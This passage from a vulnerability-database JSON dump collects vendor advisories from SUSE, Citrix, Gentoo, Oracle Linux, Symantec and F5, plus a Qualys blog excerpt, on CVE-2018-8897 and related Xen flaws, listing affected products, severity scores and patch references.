F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-03-12T19:44:00", "published": "2018-05-15T07:59:00", "id": "F5:K17403481", "href": "https://support.f5.com/csp/article/K17403481", "title": "Linux kernel vulnerability CVE-2018-8897", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2018-05-11T18:07:08", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "description": "This update for xen fixes several issues.\n\n These security issues were 
fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n These non-security issues were fixed:\n\n - bsc#1086039: Ensure that Dom0 does represent DomU cpu flags correctly\n - bsc#1027519: Fixed shadow mode guests\n\n", "edition": 1, "modified": "2018-05-11T15:07:06", "published": "2018-05-11T15:07:06", "id": "SUSE-SU-2018:1216-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00018.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-09T20:03:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - 
Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n These non-security issues were fixed:\n\n - bsc#1072834: Prevent unchecked MSR access error\n - bsc#1035442: Increase the value of LIBXL_DESTROY_TIMEOUT from 10 to 100\n seconds, allowing for more domUs to be shutdown in parallel\n - bsc#1057493: Prevent DomU crash\n\n", "edition": 1, "modified": "2018-05-09T18:16:20", "published": "2018-05-09T18:16:20", "id": "SUSE-SU-2018:1181-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00012.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-10T20:05:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege 
escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n", "edition": 1, "modified": "2018-05-10T18:07:13", "published": "2018-05-10T18:07:13", "id": "SUSE-SU-2018:1202-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00014.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-09T20:03:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM 
guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n This non-security issue was fixed:\n\n - bsc#1072834: Prevent unchecked MSR access error\n - bsc#1057493: Prevent DomU crashes\n - bsc#1086107: Fixed problems with backports for XSA-246 and XSA-247\n\n", "edition": 1, "modified": "2018-05-09T18:08:03", "published": "2018-05-09T18:08:03", "id": "SUSE-SU-2018:1177-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00011.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-11T00:06:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users 
(in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n", "edition": 1, "modified": "2018-05-10T21:07:16", "published": "2018-05-10T21:07:16", "id": "SUSE-SU-2018:1203-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00015.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-06-01T16:39:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639"], "description": "This update for xen fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-3639: Spectre V4 \u2013 Speculative Store Bypass aka \"Memory\n Disambiguation\" (bsc#1092631)\n\n This feature can be controlled by the \"ssbd=on/off\" commandline flag for\n the XEN hypervisor.\n - CVE-2018-10982: x86 vHPET interrupt injection errors (XSA-261\n bsc#1090822)\n - CVE-2018-10981: qemu may drive Xen into unbounded loop (XSA-262\n bsc#1090823)\n\n Other bugfixes:\n\n - Upstream patches from Jan (bsc#1027519)\n - additional fixes related to Page Table Isolation (XPTI). 
(bsc#1074562\n XSA-254)\n - qemu-system-i386 cannot handle more than 4 HW NICs (bsc#1090296)\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n", "edition": 1, "modified": "2018-06-01T15:08:06", "published": "2018-06-01T15:08:06", "id": "OPENSUSE-SU-2018:1487-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00002.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-05-12T02:43:24", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "description": "This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via 
non-preemptable L3/L4 pagetable freeing\n (bsc#1080635).\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n - bsc#1072834: Prevent unchecked MSR access error\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n", "edition": 1, "modified": "2018-05-12T00:37:01", "published": "2018-05-12T00:37:01", "id": "OPENSUSE-SU-2018:1274-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00059.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 6.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2018-05-10T00:04:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "description": "This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. 
They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via non-preemptable L3/L4 pagetable freeing\n (bsc#1080635).\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n - bsc#1072834: Prevent unchecked MSR access error\n\n", "edition": 1, "modified": "2018-05-09T21:09:32", "published": "2018-05-09T21:09:32", "id": "SUSE-SU-2018:1184-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00013.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 6.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-05-08T23:57:19", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. 
Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "SMNTC-104071", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104071", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2018-8897 Local Privilege Escalation Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "citrix": [{"lastseen": "2020-12-24T11:42:53", "bulletinFamily": "software", "cvelist": ["CVE-2017-5754", "CVE-2018-10892", "CVE-2018-10982", "CVE-2018-8897"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"DescriptionofProblem\"> Description of Problem</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>A number of security vulnerabilities have been identified in Citrix XenServer that may allow malicious code running in a PV guest VM to compromise the host and malicious privileged code running in an HVM guest VM to crash the host.</p>\n<p>These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including Citrix XenServer 7.4.</p>\n<p>The following vulnerabilities have been addressed:</p>\n<p>CVE-2017-5754: (High) Rogue data cache load, memory access permission check performed after kernel memory read</p>\n<p>CVE-2018-10982: (Medium) x86: vHPET interrupt injection errors</p>\n<p>CVE-2018-8897: (High) x86: mishandling of debug exceptions</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"MitigatingFactors\"> Mitigating Factors</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Customers with only HVM guest VMs with no untrustworthy 
privileged code running have mitigated these issues. Note that all Windows VMs are HVM guest VMs.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCustomersShouldDo\"> What Customers Should Do</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Hotfixes have been released to address these issues. Citrix strongly recommends that affected customers install these hotfixes as soon as possible. The hotfixes can be downloaded from the following locations:</p>\n<p>Citrix XenServer 7.4: CTX234440 \u2013 <a href=\"https://support.citrix.com/article/CTX234440\">https://support.citrix.com/article/CTX234440</a> </p>\n<p>Citrix XenServer 7.3: CTX234439 \u2013 <a href=\"https://support.citrix.com/article/CTX234439\">https://support.citrix.com/article/CTX234439</a> </p>\n<p>Citrix XenServer 7.1 LTSR CU1: CTX234437 \u2013 <a href=\"https://support.citrix.com/article/CTX234437\">https://support.citrix.com/article/CTX234437</a> </p>\n<p>Citrix XenServer 7.0: CTX234436 \u2013 <a href=\"https://support.citrix.com/article/CTX234436\">https://support.citrix.com/article/CTX234436</a> </p>\n<p>Citrix XenServer 6.5 SP1: CTX234435 \u2013 <a href=\"https://support.citrix.com/article/CTX234435\">https://support.citrix.com/article/CTX234435</a> </p>\n<p>Citrix XenServer 6.2 SP1: CTX234434 \u2013 <a href=\"https://support.citrix.com/article/CTX234434\">https://support.citrix.com/article/CTX234434</a> </p>\n<p>Citrix XenServer 6.0.2 Common Criteria: CTX234433 \u2013 <a href=\"https://support.citrix.com/article/CTX234433\">https://support.citrix.com/article/CTX234433</a> </p>\n<p>In addition, following the publication of CVE-2017-5754, Citrix committed to provide mitigations for this issue for the Citrix XenServer 7.2 release which is now End of Life. 
A hotfix for this release is available at Citrix XenServer 7.2: CTX234438 \u2013 <a href=\"https://support.citrix.com/article/CTX234438\">https://support.citrix.com/article/CTX234438</a> </p>\n<p>Note that, in line with previous statements, the hotfixes for the 6.x versions of Citrix XenServer do not include mitigations for CVE-2017-5754.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCitrixIsDoing\"> What Citrix Is Doing</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ObtainingSupportonThisIssue\"> Obtaining Support on This Issue</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ReportingSecurityVulnerabilities\"> Reporting Security Vulnerabilities</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. 
For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"Changelog\"> Changelog</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<table border=\"1\" cellpadding=\"1\" cellspacing=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td>Date </td>\n<td>Change</td>\n</tr>\n<tr>\n<td>8th May 2018</td>\n<td>Initial Publication</td>\n</tr>\n<tr>\n<td>11th May 2018</td>\n<td>Updated missing CVE identifier CVE-2018-10892</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n</div></div>\n</section>", "modified": "2018-05-11T04:00:00", "published": "2018-05-08T04:00:00", "id": "CTX234679", "href": "https://support.citrix.com/article/CTX234679", "type": "citrix", "title": "Citrix XenServer Multiple Security Updates", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2018-10-31T00:03:19", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5753", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-15468", "CVE-2018-10981", "CVE-2018-7542", "CVE-2018-12892", "CVE-2018-15470", "CVE-2018-3646", "CVE-2017-5715", "CVE-2018-12893", "CVE-2018-3620", "CVE-2018-7541", "CVE-2018-15469", "CVE-2018-10982", "CVE-2018-5244", "CVE-2018-12891"], "description": "### Background\n\nXen is a bare-metal hypervisor.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Xen. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA local attacker could cause a Denial of Service condition or disclose sensitive information. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Xen users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/xen-4.10.1-r2\"", "edition": 1, "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "GLSA-201810-06", "href": "https://security.gentoo.org/glsa/201810-06", "title": "Xen: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "kernel-uek\n[3.8.13-118.20.7]\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4098", "href": "http://linux.oracle.com/errata/ELSA-2018-4098.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:38", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "[2.6.18-419.0.0.0.11]\n- x86_64/entry: Don't use IST entry for #BP stack [orabug 28452062] {CVE-2018-8897}", "edition": 3, "modified": "2018-09-18T00:00:00", "published": "2018-09-18T00:00:00", "id": "ELSA-2018-4219", "href": "http://linux.oracle.com/errata/ELSA-2018-4219.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "[2.6.39-400.298.7]\n- net/rds: Fix endless RNR situation (Hakon Bugge) [Orabug: 27645402] \n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": 
"ELSA-2018-4097", "href": "http://linux.oracle.com/errata/ELSA-2018-4097.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "description": "[4.1.12-124.14.5]\n- vhost/scsi: fix reuse of &vq->iov[out] in response (Benjamin Coddington) [Orabug: 27928330]\n[4.1.12-124.14.4]\n- kernel.spec: add requires system-release for OL7 (Brian Maly) [Orabug: 27955380] \n- x86/kernel/traps.c: fix trace_die_notifier return value (Kris Van Hees) {CVE-2018-8897}\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}\n- kvm/x86: fix icebp instruction handling (gregkh@linuxfoundation.org) {CVE-2018-1087}", "edition": 6, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4096", "href": "http://linux.oracle.com/errata/ELSA-2018-4096.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:12", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8897"], "description": "In a memorable [scene](<https://www.youtube.com/watch?v=iyHNryKojDY>) from \u201cJumpin\u2019 Jack Flash,\u201d Whoopi Goldberg struggles to understand the lyrics of the eponymous song from the Rolling Stones, as she pleads: \u201cMick, Mick, Mick, speak English!\u201d\n\nIt appears that multiple operating system vendors had similar trouble interpreting Intel and AMD debugging documentation, which led the OS vendors to independently create the same critical security flaw in their respective kernel software.\n\n\n\nThe issue came to light last week when US-CERT (United States Computer Emergency Readiness Team) [warned](<https://www.kb.cert.org/vuls/id/631579>) that under certain circumstances \u201csome operating 
systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception.\u201d\n\n\u201cThe error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS,\u201d the CERT alert reads.\n\nThe list of OS vendors affected reads like an industry \u201cwho\u2019s who.\u201d It includes Apple, Microsoft, Red Hat, VMware, Ubuntu, Xen and SUSE Linux. The problem was discovered by researcher Nick Peterson of Everdox Tech, who has detailed the flaw in a [paper](<https://everdox.net/popss.pdf>) titled \u201cPOP SS/MOV SS Vulnerability.\u201d\n\n\u201cThis is a serious security vulnerability and oversight made by operating system vendors due to unclear and perhaps even incomplete documentation on the caveats of the POP SS and MOV SS instructions and their interactions with interrupt gate semantics,\u201d wrote Peterson and co-author Nemanja Mulasmajic from Triplefault.io.\n\nIf exploited, the vulnerability ([CVE-2018-8897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>)), which each affected vendor has now patched, could allow attackers to create a variety of problems, including crashing the impacted system, running malicious programs on it, and tampering with data.\n\n\u201cAn authenticated attacker may be able to read sensitive data in memory or control low-level operating system functions,\u201d reads the CERT advisory.\n\nAccording to [Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>), successful attackers would need to log on to the system, and run a specially-crafted application to take control of it. 
